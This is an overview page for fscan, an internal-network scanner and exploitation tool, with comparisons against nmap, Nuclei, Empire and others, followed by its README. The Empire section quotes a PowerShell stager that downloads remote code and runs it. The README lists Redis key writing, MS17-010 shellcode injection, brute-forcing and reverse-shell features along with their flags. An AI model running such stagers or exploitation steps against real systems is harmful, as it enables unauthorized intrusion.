shadow1ng / fscan

A comprehensive internal network scanning tool for convenient one-click automated, all-round vulnerability scanning.

Quick Overview

fscan is an internal network scanning tool designed for penetration testing and security assessments. It combines multiple functionalities such as port scanning, service detection, brute-force attacks, and vulnerability exploitation into a single, efficient tool. The project aims to simplify and streamline the process of internal network reconnaissance and vulnerability discovery.

Pros

  • All-in-one solution for internal network scanning and exploitation
  • Fast and efficient, utilizing concurrent scanning techniques
  • Regularly updated with new features and vulnerability checks
  • Cross-platform support (Windows, Linux, Mac)

Cons

  • Potential for misuse if not handled responsibly
  • May trigger antivirus or intrusion detection systems
  • Limited documentation, especially for advanced features
  • Some features may require additional dependencies or configurations

Getting Started

To get started with fscan:

  1. Download the latest release from the GitHub repository.
  2. Extract the executable for your operating system.
  3. Open a terminal or command prompt and navigate to the directory containing the fscan executable.
  4. Run fscan with desired options:
# Basic scan of a single IP
./fscan -h 192.168.1.1

# Scan a network range with common ports
./fscan -h 192.168.1.1/24 -p 80,443,3306,3389,5432,6379,9200,11211,27017

# Full scan: all ports, all modules (the default mode), results saved to a file
./fscan -h 192.168.1.1/24 -p 1-65535 -o results.txt

For more advanced usage and options, refer to the project's README and documentation on the GitHub repository.

Competitor Comparisons

Nuclei is a fast, customizable vulnerability scanner powered by the global security community and built on a simple YAML-based DSL, enabling collaboration to tackle trending vulnerabilities on the internet. It helps you find vulnerabilities in your applications, APIs, networks, DNS, and cloud configurations.

Pros of Nuclei

  • More extensive and customizable scanning capabilities with a large library of templates
  • Active community development and regular updates
  • Better documentation and integration with other security tools

Cons of Nuclei

  • Steeper learning curve due to its more complex template system
  • Potentially slower scanning speed for basic tasks compared to Fscan's lightweight approach

Code Comparison

Fscan (basic port scanning):

func ScanPort(ip string, port int) {
    address := fmt.Sprintf("%s:%d", ip, port)
    conn, err := net.DialTimeout("tcp", address, time.Second*2)
    if err == nil {
        conn.Close()
        fmt.Printf("Port %d is open\n", port)
    }
}

Nuclei (template-based scanning):

id: example-scan
info:
  name: Example Scan
  severity: info
requests:
  - method: GET
    path:
      - "{{BaseURL}}/example"
    matchers:
      - type: word
        words:
          - "Example Response"

The code comparison highlights the different approaches: Fscan uses direct Go code for basic port scanning, while Nuclei employs YAML-based templates for more flexible and customizable scans.

Nmap - the Network Mapper. Github mirror of official SVN repository.

Pros of nmap

  • Extensive feature set and flexibility for network scanning and discovery
  • Large, active community and ongoing development
  • Well-documented with comprehensive man pages and online resources

Cons of nmap

  • Steeper learning curve for beginners
  • Can be slower for large-scale scans compared to more specialized tools
  • Requires root/admin privileges for many scan types

Code comparison

nmap:

nmap -sV -sC -p- 192.168.1.0/24

fscan:

fscan.exe -h 192.168.1.1/24 -p 1-65535

Both tools allow for network scanning, but nmap offers more granular control over scan types and options, while fscan provides a simpler syntax for quick scans.

nmap is a comprehensive, well-established network scanning and discovery tool with a wide range of features and customization options. It's ideal for detailed network analysis and security assessments but may require more time to master.

fscan is a lightweight, fast scanner written in Go, designed for internal network scanning. It's easier to use for basic scans and may be quicker for large-scale scans, but lacks some of the advanced features and flexibility of nmap.

Choose nmap for in-depth network analysis and security testing, or fscan for quick and simple internal network scans.

TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.

Pros of masscan

  • Extremely fast scanning capabilities, able to scan the entire Internet in under 6 minutes
  • Written in C, offering high performance and low-level control
  • Supports a wide range of scanning options and customization

Cons of masscan

  • Primarily focused on port scanning, lacking the broader functionality of fscan
  • May require more technical expertise to use effectively
  • Less actively maintained, with fewer recent updates compared to fscan

Code Comparison

masscan (C):

int
proto_banner1_tcp(
    struct Banner1 *banner1,
    struct ProtocolState *pstate,
    const unsigned char *px, size_t length,
    struct BannerOutput *banout,
    struct InteractiveData *more)
{
    // TCP protocol handling code
}

fscan (Go):

func (s *Scanner) TCPScan(ip string, port int, service string) {
    conn, err := net.DialTimeout("tcp", fmt.Sprintf("%s:%d", ip, port), s.Timeout)
    if err != nil {
        return
    }
    defer conn.Close()
    // Further scanning logic
}

The code snippets demonstrate the different approaches and languages used by each project. masscan's C implementation offers low-level control, while fscan's Go code provides a more high-level and readable structure.

A Tool for Domain Flyovers

Pros of Aquatone

  • Specialized in web-based reconnaissance and screenshot capture
  • Supports multiple input formats (URLs, Nmap XML, text files)
  • Generates comprehensive HTML reports with screenshots and clustering

Cons of Aquatone

  • Limited to web-based targets and doesn't perform broader network scanning
  • Requires external tools for full functionality (e.g., ChromeDriver)
  • Less actively maintained compared to Fscan

Code Comparison

Fscan (Go):

func (s *Scanner) TCPScan(ip string, port int) {
    conn, err := net.DialTimeout("tcp", fmt.Sprintf("%s:%d", ip, port), time.Duration(s.Timeout)*time.Second)
    if err == nil {
        conn.Close()
        s.AddResult(ip, port, "open")
    }
}

Aquatone (Ruby):

def capture_screenshot(url, output_file)
  browser.navigate.to(url)
  browser.save_screenshot(output_file)
rescue => e
  @logger.error("Error capturing screenshot of #{url}: #{e}")
end

The code snippets highlight the different focus areas of each tool. Fscan performs TCP port scanning, while Aquatone captures web screenshots using a browser automation tool.

Empire is a PowerShell and Python post-exploitation agent.

Pros of Empire

  • More comprehensive post-exploitation framework with extensive modules
  • Active community and regular updates
  • Supports multiple communication protocols for C2

Cons of Empire

  • Larger footprint and more complex to set up and use
  • Higher likelihood of detection due to its popularity
  • Requires more resources to run effectively

Code Comparison

Empire (PowerShell stager):

$wc=New-Object System.Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko");$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;IEX $wc.DownloadString("http://empire.server/launcher");

fscan (Go scanner function):

func (s *Scanner) ScanPort(ip string, port int) (result string, err error) {
    conn, err := net.DialTimeout("tcp", fmt.Sprintf("%s:%d", ip, port), time.Duration(s.Timeout)*time.Second)
    if err != nil {
        return "", err
    }
    defer conn.Close()
    return fmt.Sprintf("%s:%d open", ip, port), nil
}

Summary

Empire is a more comprehensive post-exploitation framework with extensive capabilities, while fscan is a lightweight, focused network scanner. Empire offers more features but is more complex, while fscan is simpler and easier to use for specific scanning tasks. The choice between them depends on the specific requirements of the security assessment or penetration testing scenario.

E-mails, subdomains and names Harvester - OSINT

Pros of theHarvester

  • More comprehensive OSINT gathering capabilities, including email harvesting and domain information collection
  • Supports a wider range of search engines and data sources
  • Actively maintained with regular updates and contributions from the community

Cons of theHarvester

  • Primarily focused on information gathering, lacking the extensive vulnerability scanning features of fscan
  • May require additional tools for a complete security assessment
  • Can be slower when performing extensive searches across multiple data sources

Code Comparison

theHarvester:

from theHarvester.lib.core import *
from theHarvester.discovery import *

search = googlesearch.search_google(word, limit, start)
search.process()
emails = search.get_emails()

fscan:

func (s *Scanner) TCPScan(ip string, ports []int) {
    for _, port := range ports {
        s.ScanPort(ip, port)
    }
}

The code snippets highlight the different focus areas of each tool. theHarvester emphasizes OSINT gathering through search engines, while fscan concentrates on network scanning and vulnerability assessment.

README

Fscan 2.0.0

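0x00 New Features

1. UI/UX improvements

2. Added and changed the -f and -o parameters: -f supports txt/csv/json, and the output format has been improved

3. Added port fingerprinting.

4. Added a local information gathering module, a local domain controller detection module and a local Minidump module

5. Added scanning for Telnet, VNC, Elasticsearch, RabbitMQ, Kafka, ActiveMQ, LDAP, SMTP, IMAP, POP3, SNMP, Zabbix, Modbus, Rsync, Cassandra and Neo4j.

6. Architecture refactored, built on reflection plus plugin modules

7. Added the -log parameter, which accepts INFO, SUCCESS, ERROR and DEBUG, for debugging specific information.

8. Threading optimized; it now runs with better multithreading

Because the new version is a complete refactoring of the old code, bugs are inevitable. Please submit an Issue when you encounter a bug and it will be fixed as soon as possible. Thank you.

New plugin modules are welcome. Plugins are currently quick and hot-pluggable, which suits simple development.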

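0x01 Introduction

A feature-rich, comprehensive internal network scanning tool that provides one-click automated, all-round vulnerability scanning.

Main features

  • Host discovery: quickly identify live hosts on the internal network
  • Port scanning: comprehensively detect open ports on target hosts
  • Service brute-forcing: supports password brute-force testing against common services
  • Vulnerability exploitation: integrates detection of high-risk vulnerabilities such as MS17-010
  • Redis exploitation: supports batch writing of public keys to obtain access
  • System information collection: can read Windows network adapter information
  • Web application detection:
    • Web fingerprinting
    • Web vulnerability scanning
  • Domain environment detection:
    • NetBIOS information retrieval
    • Domain controller identification
  • Post-exploitation: supports reverse shells via scheduled tasks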

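0x02 Main Features

1. Information gathering

  • ICMP-based host discovery: quickly identify live hosts on the network
  • Comprehensive port scanning: systematically check the open ports of target hosts

2. Brute-forcing

  • Password brute-forcing of common services: supports authentication testing for SSH, SMB, RDP and other protocols
  • Database password brute-forcing: covers mainstream database systems such as MySQL, MSSQL, Redis, PostgreSQL and Oracle

3. System information and vulnerability scanning

  • Network information collection: includes NetBIOS probing and domain controller identification
  • System information retrieval: can read the network adapter configuration of the target system
  • Security vulnerability detection: supports identification and detection of high-risk vulnerabilities such as MS17-010

4. Web application detection

  • Website information collection: automatically retrieves website titles
  • Web fingerprinting: can identify common CMS systems and OA frameworks
  • Vulnerability scanning: integrates WebLogic, Struts2 and other vulnerability checks, compatible with XRay POCs

5. Exploitation modules

  • Redis exploitation: supports writing a public key or planting a scheduled task
  • SSH remote execution: provides SSH command execution
  • MS17-010 exploitation: supports ShellCode injection, enabling operations such as adding a user

6. Auxiliary features

  • Result storage: saves all detection results to a file for later analysis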

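0x03 Usage

Basic scan configuration

Because of the refactoring, not every parameter below is guaranteed to work correctly. Please submit an Issue promptly if you run into a problem.

Target configuration

-h      Specify targets (supported formats: 192.168.1.1/24, 192.168.1.1-255, 192.168.1.1,192.168.1.2)
-eh     Exclude specific targets
-hf     Import targets from a file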
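
A scope check for the `-h` target formats listed above, as an added example that is not fscan's own code: it expands each item to its first and last address and reports the items that fall outside an authorized range. The names `bounds`, `OutOfScope` and `demoScope` are hypothetical, and `192.168.1.1-255` is assumed to mean a range over the last octet.

```go
package main

import (
	"fmt"
	"net/netip"
	"strings"
)

// bounds returns the first and last IPv4 address covered by one target item.
func bounds(item string) (first, last netip.Addr, err error) {
	if p, perr := netip.ParsePrefix(item); perr == nil && p.Addr().Is4() {
		b := p.Masked().Addr().As4() // 192.168.1.1/24 -> 192.168.1.0
		for i := p.Bits(); i < 32; i++ {
			b[i/8] |= 1 << (7 - i%8) // set the host bits: last address of the block
		}
		return p.Masked().Addr(), netip.AddrFrom4(b), nil
	}
	host, octet, isRange := strings.Cut(item, "-")
	end := host
	if isRange { // assumption: a.b.c.d-N is a range over the last octet, d through N
		end = host[:strings.LastIndex(host, ".")+1] + octet
	}
	first, err = netip.ParseAddr(host)
	if last, _ = netip.ParseAddr(end); err != nil || !first.Is4() || !last.Is4() || last.Less(first) {
		return first, last, fmt.Errorf("bad target %q", item)
	}
	return first, last, nil
}

// OutOfScope lists the items of a -h style spec not fully inside an authorized prefix.
func OutOfScope(spec string, authorized []netip.Prefix) (bad []string, err error) {
	for _, item := range strings.Split(spec, ",") {
		first, last, err := bounds(strings.TrimSpace(item))
		if err != nil {
			return nil, err
		}
		inScope := false
		for _, p := range authorized { // a contiguous range is inside p iff both ends are
			inScope = inScope || (p.Contains(first) && p.Contains(last))
		}
		if !inScope {
			bad = append(bad, strings.TrimSpace(item))
		}
	}
	return bad, nil
}

var demoScope = []netip.Prefix{netip.MustParsePrefix("192.168.1.0/24")} // constructed scope

func main() { fmt.Println(OutOfScope("192.168.1.1-255,192.168.2.1/24", demoScope)) }
```

Run it against the exact string that will be passed to `-h` before a scan starts; `-eh` exclusions and `-hf` files are not modelled.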

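Port configuration

-p      Specify the port range (default: common ports), e.g. -p 22,80,3306 or -p 1-65535
-portf  Import a port list from a file

Authentication configuration

Username and password

-user   Specify a username
-pwd    Specify a password
-userf  Username dictionary file
-pwdf   Password dictionary file
-usera  Add extra usernames
-pwda   Add extra passwords
-domain Specify a domain

SSH

-sshkey Path to the SSH private key
-c      Command to execute after the SSH connection is established

Scan control

Scan mode

-m      Specify the scan mode (default: All)
-t      Number of threads (default: 60)
-time   Timeout (default: 3 seconds)
-top    Number of host-discovery results to display (default: 10)
-np     Skip host discovery
-ping   Use ping instead of ICMP
-skip   Skip fingerprinting

Web scan configuration

-u      Scan a single URL
-uf     Import a URL list from a file
-cookie Set a Cookie
-wt     Web request timeout (default: 5 seconds)

Proxy settings

-proxy  HTTP proxy (e.g. http://127.0.0.1:8080)
-socks5 SOCKS5 proxy (e.g. 127.0.0.1:1080)

POC scan configuration

-pocpath POC file path
-pocname Specify a POC name
-full    Enable full POC scanning
-dns     Enable DNS logging
-num     POC concurrency (default: 20)

Redis exploitation configuration

-rf      Redis file name
-rs      Redis shell configuration
-noredis Disable Redis detection

Output control

-o       Output file path (default: off)
-f       Output format (default: txt)
-no      Disable saving results
-silent  Silent mode
-nocolor Disable colored output
-json    JSON output
-log     Log level
-pg      Show a scan progress bar

Other configuration

-local   Local mode
-nobr    Disable brute-forcing
-retry   Maximum number of retries (default: 3)
-path    Remote path configuration
-hash    Hash value
-hashf   Hash file
-sc      Shellcode configuration
-wmi     Enable WMI
-lang    Language (default: zh)

Because of the refactoring, not every parameter above is guaranteed to work correctly. Please submit an Issue promptly if you run into a problem.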

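Build

# Basic build (-o names the binary fscan, which the UPX step below expects)
go build -ldflags="-s -w" -trimpath -o fscan main.go

# UPX compression (optional)
upx -9 fscan

System installation

# Arch Linux
yay -S fscan-git
# or
paru -S fscan-git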

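0x04 Screenshots

fscan.exe -h 192.168.x.x (all features, ms17010, reading network adapter information)

fscan.exe -h 192.168.x.x -rf id_rsa.pub (Redis: write a public key)

fscan.exe -h 192.168.x.x -c "whoami;id" (SSH command)

fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 (one-step support for xray POCs)

fscan.exe -h 192.168.x.x -p 139 (NetBIOS probing and domain controller identification; [+]DC in the screenshot marks a domain controller)

go run .\main.go -h 192.168.x.x/24 -m netbios (the full NetBIOS information is shown only with -m netbios)

go run .\main.go -h 192.0.0.0/8 -m icmp (probes the gateway and several random IPs of each C segment (/24), and counts the top 10 B and C segments by live hosts)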

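0x05 Disclaimer

This tool is intended only for lawfully authorized enterprise security work. If you need to test the tool's usability, please set up your own target environment.

To avoid malicious use, all POCs included in this project are theoretical checks for vulnerabilities; they contain no exploitation process and will not launch real attacks or exploitation against targets.

When using this tool for testing, you must ensure that the activity complies with local laws and regulations and that you have obtained sufficient authorization. Do not scan unauthorized targets.

If you engage in any illegal activity while using this tool, you bear the consequences yourself; we accept no legal or joint liability.

Before installing and using this tool, please read carefully and fully understand the content of each clause. Limitations, disclaimers and other clauses involving your significant rights and interests may be shown in bold, underlined or similar form to draw your attention.

Unless you have fully read, completely understood and accepted all the terms of this agreement, please do not install or use this tool. Your use of the tool, or your acceptance of this agreement in any other express or implied manner, is deemed to mean that you have read and agreed to be bound by this agreement.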

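0x06 404StarLink 2.0 - Galaxy

fscan is part of the 404Team StarLink Project 2.0. If you have any questions about fscan or want to find others to discuss it with, see the StarLink Project's instructions for joining the group.

Demo video: [Security Tools] 5 major features, a one-click internal network scanning tool: 404 StarLink Project fscan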

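0x11 Recent Updates

2025 updates

  • Added plugins

2024 updates

  • 2024/12/19: v2.0.0 major update
    • Complete code refactoring, improving performance and maintainability
    • Redesigned modular architecture with support for plugin extensions
    • Improved concurrency control, increasing scan efficiency

2023 updates

  • 2023/11/13:
    • Added colored console output (disable with -nocolor)
    • Support for saving results in JSON format (-json)
    • Adjusted the minimum TLS version to 1.0
    • Support for port groups (-p db,web,service)

2022 updates

  • 2022/11/19: Added hash collision and wmiexec command execution without output
  • 2022/7/14: Improved file import support and search matching
  • 2022/7/6: Optimized memory management, extended URL support
  • 2022/7/2:
    • Enhanced the POC fuzz module
    • Added MS17017 exploitation
    • Added socks5 proxy support
  • 2022/4/20: Added POC path specification and port file import
  • 2022/2/25: Added webonly mode (thanks to @AgeloVito)
  • 2022/1/11: Added Oracle password brute-forcing
  • 2022/1/7: Improved scanning of large network ranges, added LiveTop

2021 updates

  • 2021/12/7: Added RDP scanning
  • 2021/12/1: Comprehensive optimization of functional modules
  • 2021/6/18: Improved the POC identification mechanism
  • 2021/5/29: Added FCGI unauthorized-access scanning
  • 2021/5/15: Released a Windows 2003 version
  • 2021/5/6: Updated core modules
  • 2021/4/21: Added NetBIOS probing and domain controller identification
  • 2021/3/4: Support for batch URL scanning
  • 2021/2/25: Support for password brute-forcing
  • 2021/2/8: Added fingerprinting
  • 2021/2/5: Optimized ICMP probing

2020 updates

  • 2020/12/12: Integrated a YAML parsing engine, with support for XRay POCs
  • 2020/12/6: Optimized the ICMP module
  • 2020/12/03: Improved IP range handling
  • 2020/11/17: Added the WebScan module
  • 2020/11/16: Optimized the ICMP module
  • 2020/11/15: Support for importing IPs from a file

Thanks to all the developers who have contributed to the project.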